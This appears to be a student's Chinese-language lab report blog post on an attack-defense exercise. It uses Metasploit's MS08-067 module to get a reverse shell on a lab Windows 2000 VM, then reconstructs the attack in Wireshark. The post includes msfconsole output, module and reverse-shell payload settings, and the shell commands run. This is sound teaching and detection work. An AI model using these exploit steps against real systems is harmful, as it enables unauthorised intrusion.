[*] 192.168.43.3:445 - Selected Target: Windows 2000 Universal
[*] 192.168.43.3:445 - Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.43.131:4444 -> 192.168.43.3:1079) at 2026-04-27 02:18:46 -0400

Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]

C:\WINNT\system32>

漂亮——Win2k 中文繁体被精确指纹识别，shell 直接弹回到 Kali 的 4444 端口。然后我立刻在拿到的 cmd 里跑了三条命令完成攻击的"签到"：

mkdir shuaige
cd shuaige
echo I am lijiatong 20253909 lijiatong>>Test.txt

图44：exploit 一击命中——Command shell session 1 opened；接着在 C:\WINNT\system32 下 mkdir shuaige，cd 进去 echo "I am lijiatong 20253909 lijiatong" 写到 Test.txt，作为攻击成功的"签到"印记

为什么取名 shuaige（"帅哥"）这个文件夹名？纯粹是给队友看的小幽默——攻防演练嘛，留点彩蛋让他翻日志的时候笑一下。echo ... >>Test.txt 用的是追加重定向，确保文件被创建并写入指定字符串。

步骤 8：守方靶机上验证印记

到队友的 Win2k 桌面上去看，C:\WINNT\system32\shuaige\ 目录下确实出现了 Test.txt，双击打开，内容就是 I am lijiatong 20253909 lijiatong——35 字节，正好对应那一行加上行尾的 CRLF：

图45：在 Win2k 资源管理器里看到 C:\WINNT\system32\shuaige 目录被创建出来，里面有 Test.txt，记事本打开内容正是攻方的身份签名 "I am lijiatong 20253909 lijiatong"

到这里攻方目标完全达成：

✅ 利用 MS08-067 漏洞从 192.168.43.131 远程拿下 192.168.43.3 的 cmd shell
✅ 在靶机文件系统上创建了 C:\WINNT\system32\shuaige\Test.txt
✅ 文件内容包含攻方的学号、姓名签名

守方分析——Wireshark 还原攻击全过程

接下来切到守方视角。守方在攻击发起前就在 Win2k 靶机的网卡上启动了 Wireshark，整个攻击的流量都被无差别地抓下来了。

步骤 9：先看 ICMP——确认探测阶段

攻击开始之前我们做过双向 ping 测试，所以 Wireshark 里第一波流量就是 ICMP。守方过滤 icmp 后看到三对 echo request/reply：

图46：Wireshark 在 eth0 上抓到 192.168.43.131 ↔ 192.168.43.3 的双向 ICMP echo request/reply（包 23-28），持续约 2 秒，这就是攻防开始前的 ping 连通测试

从这里就能识别出192.168.43.131 是攻击者的 IP——它在主动探测靶机。

步骤 10：Follow TCP Stream——看 4444 端口反弹通道里的明文命令

真正的"决定性证据"在 4444 端口的反弹 shell 通道里。守方右键任一 4444 端口的包 → Follow → TCP Stream，立刻看到了完整的命令交互：

图47：tcp.stream eq 1 是攻方反弹 shell 的 TCP 流——红色是攻方下发的命令（mkdir shuaige、cd shuaige、echo I am lijiatong 20253909 lijiatong>>Test.txt），蓝色是 Win2k cmd 的回显（每条命令在 cmd 里都会被原样 echo 一次再执行）；451 字节的会话里 13 个客户端包、5 个服务器包，10 个交互回合，把整个攻击过程还原得一清二楚

这一张图就是守方的"破案铁证"。从中可以提取出完整的攻击信息：

提取项	取值	提取依据
攻击源 IP	192.168.43.131	TCP Stream 中作为 reverse shell 的接收端（Source 中 192.168.43.131）
目标 IP	192.168.43.3	TCP Stream 中作为 shell 的发送端
目标端口（漏洞）	445/TCP	exploit 阶段流量出现在 445（流分析时看到 SMB）
反弹端口	4444/TCP	shell 通道在 4444
所用漏洞	MS08-067（推测）	SMB 445 端口异常的 SMB Negotiate + RPC 调用 srvsvc
攻击者执行的命令	`mkdir shuaige` / `cd shuaige` / `echo I am lijiatong 20253909 lijiatong>>Test.txt`	TCP Stream 中明文可见
攻击者身份提示	`lijiatong 20253909`	echo 命令中的字符串

还能注意到一个细节：流的开头有一个奇怪的字符串 TKMdwLFEWoCsArS50mQGzFu——这是 msf 的 reverse_tcp shell stage 在握手时打印出来的随机标识符（用来同步反弹通道的状态机），不是攻击命令本身。看到这种字符串就基本可以确认是 Metasploit 反弹 shell 而不是手工 nc。

攻击过程时序图

把整个对抗串起来：

T0  双方虚拟机切桥接模式，DHCP 拿到 192.168.43.131 / 192.168.43.3
T1  Kali → Win2k 双向 ping，确认连通性                     [Wireshark 抓到 ICMP]
T2  Kali msfconsole → use ms08_067_netapi → 配 payload/RHOST/LHOST
T3  Kali exploit
       └─→ Win2k:445 SMB Negotiate → SMB Tree Connect
       └─→ srvsvc RPC NetPathCanonicalize() 栈溢出触发    [Wireshark 抓到 SMB+DCERPC]
       └─→ shellcode 执行，回连 192.168.43.131:4444
T4  Kali 4444 端口收到 cmd shell                          [Wireshark Follow Stream 1]
T5  Kali cmd> mkdir shuaige
T6  Kali cmd> cd shuaige
T7  Kali cmd> echo I am lijiatong 20253909 lijiatong>>Test.txt
T8  守方在 Win2k 桌面看到 C:\WINNT\system32\shuaige\Test.txt

第三部分小结

视角	主要工具	关键操作	关键证据
攻方（lijiatong / 20253909）	Metasploit Framework v6.4.64-dev	use ms08_067_netapi, set payload generic/shell_reverse_tcp, exploit	session 1 opened, mkdir shuaige, echo > Test.txt
守方	Wireshark + Follow TCP Stream	实时抓 eth0 流量, 过滤 tcp.port==4444, Follow TCP Stream	完整还原攻击命令、攻击者 IP、攻击端口、攻击者身份字符串

三、学习中遇到的问题及解决

问题 1：第一部分中，msfconsole 启动时报 PostgreSQL 数据库未连接的提示。
问题 1 解决方案：msf 需要 PostgreSQL 来管理模块缓存和工作区。先 service postgresql start 把数据库启起来，再用 msfdb init 初始化数据库（创建用户 msf 和数据库 msf/msf_test，并写入 /usr/share/metasploit-framework/config/database.yml），最后再 msfconsole，这次就不会再报红色警告了。这个步骤每次重启 Kali 后都需要重做（除非把 PostgreSQL 设成开机自启动）。

问题 2：第二部分排查 pcap 时，发现 ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http 过滤出来 4845 个包，太多看不过来。
问题 2 解决方案：分阶段过滤。先用 http.request.uri contains "msadc" 把 MSADC 攻击流量挑出来（只剩几十个），再单独 Follow TCP Stream 看 payload；用 tcp.port == 6969 把后门 shell 流量挑出来（1879 个）；用 ftp 把 FTP 工具传输流量挑出来。这样每一种攻击行为对应一个独立的过滤器，思路就清晰了。

问题 3：第三部分把虚拟机切桥接模式后，两台机器还是 ping 不通——一边能 ping 通对方，一边不行。
问题 3 解决方案：发现是 Win2k 的本地连接被防火墙策略阻挡了（虽然 Win2k 没有内置防火墙，但 VMware 虚拟交换机的某些过滤可能会拦截）。在 Win2k 上把"复制物理网络连接状态"勾上，重启网卡，问题立刻解决。另外还要确保两台虚拟机的 VMnet 适配器选择的是同一个物理网卡（这次都是 VMnet0 桥接到笔记本的无线网卡）。

问题 4：第三部分发起 exploit 时，第一次没拿到 shell，msf 提示 "Exploit completed, but no session was created"。
问题 4 解决方案：检查发现 LHOST 配错了——我把 LHOST 设成了 192.168.43.131 上一个旧的 NAT 网卡 IP（192.168.200.x），结果 shellcode 回连地址不对，自然连不上。改成 ifconfig 看到的 eth0 当前 IP 192.168.43.131 后，exploit 一次成功。这个教训是：桥接模式下 LHOST 一定要用 ifconfig 实时确认的 IP，不能用记忆中的 IP。

问题 5：守方 Wireshark 抓包时，eth0 上流量太多（背景流量、ARP、DHCP 等），找 4444 端口的反弹 shell 流量很费劲。
问题 5 解决方案：直接在 Wireshark 显示过滤栏输入 tcp.port == 4444，只看反弹 shell 的流量；如果还想看 SMB 的攻击流量就用 tcp.port == 445。Follow TCP Stream 会自动把整个 stream 的包都拼起来，比一个个看包方便多了。

四、实践总结

做完这次实验，我对攻防对抗的"立体感"有了更深的体会——不再是只学防御或只学攻击，而是同一件事从两个视角各做一遍，左右互搏。

第一部分让我第一次完整体会到 Metasploit 这种"框架级"工具的威力。MS08-067 这个漏洞从 2008 年到现在已经快 20 年，但 msf 把它打磨成了一个开箱即用、自动指纹、自动选 target、自动 fingerprint 的"傻瓜式"模块。我只需要知道目标 IP，set 几个参数，敲一下 exploit，剩下的全是 msf 的事——它甚至能从 SMB 协商的细节里识别出 "Windows 2000 SP0 Chinese Traditional" 这么具体的版本。这种工程化的成熟度让我意识到，攻防领域真正的门槛不是漏洞本身的技术细节，而是把已知漏洞工程化、规模化、自动化的能力。msf 就是这种能力的典范。

第二部分则像一次"破案"。从 6707 个原始数据包出发，一层层拨开攻击者的每一步动作：先浏览主页是踩点，测 boot.ini 是验漏洞，POST msadc 是发武器，开 6969 是建后门，FTP 拉工具是搬砖，net user 是侦察，pdump 是夺权，del 是擦痕，echo 是留言。每一步都对应着抓包里具体的几个数据包，每一步都有它的"指纹"——比如 ACTIVEDATA 这个 User-Agent、!ADM!ROX!YOUR!WORLD! 这个边界字符串就是 msadc.pl 的"DNA"。这种"工具的特征会出卖工具的使用者" 的现象很有意思——攻击者就算把自己的 IP 隐藏得再好，他用的工具会替他签名。这也是为什么 IDS 规则库里有那么多基于特定字符串的匹配规则。

特别值得品味的是攻击者最后那句留言："Hi, i know that this a ..is a lab server, but patch the holes! 😃"——攻击者知道这是蜜罐，还是把全套流程跑了一遍。这反映出地下圈子里很特别的一种"礼仪"：你下了套，我入了局，但我把局演完，并且大方告诉你"我看穿了，但我也很捧场"。这是技术社区独有的浪漫，黑客文化里那种"hack the planet" 的精神在里面看得很清楚。

第三部分的团队对抗是最有"实战感"的环节。当 msf 的 exploit 命令敲下去、几秒后 Command shell session 1 opened 跳出来的时候，那种"它真的过来了"的成就感是前两部分回放别人的攻击不能比的。但更让我印象深刻的是另一面——守方用 Wireshark Follow TCP Stream 把我的 mkdir shuaige 一字不漏地复现出来，连 I am lijiatong 20253909 lijiatong 这一串自我标榜的字符串都被原样抓到。这一刻我理解了为什么实战里所有上层应用都要走 TLS——没有加密的 cmd 反弹 shell 在网络上就是一张明信片，谁拿到流量谁都能看。TLS 不是奢侈品，是生存必需品。

三个部分串起来看，其实是在教一件事：漏洞、利用、检测、防御构成一个完整的对抗循环。 MS08-067 给了攻方一个开洞机会，msf 把它打磨成 5 行命令的模块，攻方用它进入；守方用 Wireshark 抓到流量、用 Follow Stream 还原命令、用流量特征反推攻击工具——这些就是 IDS 检测规则的雏形。每一种攻击都会留下流量上的痕迹，每一个痕迹都可以被沉淀为一条检测规则，每一条检测规则又会推动攻击者寻找新的绕过手段。这就是攻防永恒的"军备竞赛"。我们这次实验，相当于浓缩地经历了这个循环的一整圈。

最后一点感悟是关于学号和身份——把 I am lijiatong 20253909 lijiatong 写到队友的服务器上当然是个无害的玩笑，但它也直观地展示了：一旦失守，攻击者能以你的身份在系统里写任何东西。如果今天写的是 "lijiatong" 这种无害的字符串，明天写的可能就是篡改的银行交易、伪造的医疗记录、被植入的勒索软件密钥——同样的技术原理，同样的几行代码，截然不同的后果。所以做攻防研究的人特别要守得住伦理底线，让自己的能力只在该用的地方用。

参考资料

Metasploit Framework 官方文档
MS08-067 漏洞官方公告
CVE-2008-4250 详细分析
Honeynet Project Scan of the Month #15
rfp's MSADC Exploit (msadc.pl) 源码与说明
MS99-025（MSADC RDS 漏洞）官方公告
MS00-078（IIS Unicode 路径穿越）官方公告
Wireshark User Guide - Follow TCP Stream
诸葛建伟, 薛静锋. 网络攻防技术与实践[M]. 电子工业出版社.
W. Richard Stevens. TCP/IP Illustrated, Volume 1: The Protocols[M]. Addison-Wesley, 1994.

posted @ 2026-04-27 19:42 帅哥KID23 阅读(40) 评论(0) 收藏举报

刷新页面返回顶部

Jerome-KID